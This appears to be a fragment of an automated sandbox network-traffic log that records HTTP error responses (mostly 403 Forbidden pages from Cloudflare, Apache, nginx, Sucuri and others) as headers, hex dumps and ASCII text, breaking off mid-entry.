                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:54:07 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a1Lx0wRlbAoQSeThyGz6RyetDTAK06IVPfxyHYphbX7v6LnNs3Ln%2BDZQVIMoZx6KT6tK4w0atcVJW%2FsGilCjlEayH8WaAvdzbsYkrC5BwS98CqyowO%2FFgiuSX%2FHauTHK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76e580e6dbbb5-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudfl
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:53:53 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 27 Jul 2023 19:53:53 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:53 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:53 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Thu, 27 Jul 2023 19:53:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 27 Jul 2023 19:53:53 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:53 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H%2BYeZX1n0MbLXNVVUtr4%2BxaKlaaII7o3zMXb6HRTEKFtYw1NgNCWveZpnBY8khxHRWWJO73%2FYS%2FLUOBog6dvdE03E4l0EtKvg3n2yVuko1SRLgY9%2BFCBdXybbtXqX%2Bo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76e5fcc7568f8-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:53 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=76HIelj3SFcT4iRJV%2FgdHBd1uQV1DMLEO0nUkFSfDHUGV9SnlHnjKib9lJX5qG3OXygGp1BL32eYIFNn%2B%2FgIjVYywG8guW8uV0tb2asQvsaYAXD%2FJfw%2FiLm%2F1Djbgow%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76e600cb968f8-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:53 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7%2ByvLwu10ZuTeGfufKSkDehdEZfeBuA25hO3T%2BHq0wdeIwHE%2B5jexMrOS%2FyjprtcVjEdsTej7x6EeW9XMz%2F9BbvsHgrtwjqkDmk1quTiOymFsZGQ9jRp6O1hx0d1vps%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76e601c545c20-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:54 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:53 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 